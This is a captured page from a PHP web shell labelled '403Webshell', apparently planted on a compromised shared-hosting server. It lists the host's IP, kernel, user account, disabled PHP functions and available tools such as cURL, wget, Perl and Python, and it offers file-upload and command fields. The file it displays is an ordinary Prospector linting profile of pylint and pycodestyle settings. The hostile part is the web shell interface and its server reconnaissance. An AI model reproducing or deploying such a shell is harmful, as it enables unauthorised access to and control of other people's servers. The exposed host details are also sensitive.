403Webshell
Server IP : 62.60.133.156  /  Your IP : 216.73.217.51
Web Server : LiteSpeed
System : Linux linux24.centraldnserver.com 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
User : mimradmin ( 1166)
PHP Version : 7.4.33
Disable Function : show_source, system, shell_exec, passthru, exec, popen, proc_open
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : OFF |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib/python3.11/site-packages/prospector/profiles/profiles/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib/python3.11/site-packages/prospector/profiles/profiles/strictness_high.yaml
allow-shorthand: false

inherits:
  - strictness_veryhigh

ignore-patterns:
  - ^setup.py$

pylint:
  disable:
    - trailing-whitespace
    - missing-final-newline
    - too-few-public-methods
    - too-many-public-methods
    - deprecated-lambda
    - bad-builtin
    - star-args
    - global-statement
    - assignment-from-none
    - unused-format-string-key
    - W5103

  options:
    max-locals: 15
    max-returns: 6
    max-branches: 15
    max-statements: 60
    min-public-methods: 1
    max-public-methods: 20
    max-line-length: 99

pycodestyle:
  options:
    max-line-length: 99
  disable:
    - E304
    - E265
    - E266
    - W291
    - W292
    - W391
    - N811
    - N812
    - N813
    - N814

pyroma:
  disable:
    - PYR15
    - PYR18
    - PYR17

pydocstyle:
  disable:
    - D400
    - D401

Youez - 2016 - github.com/yon3zu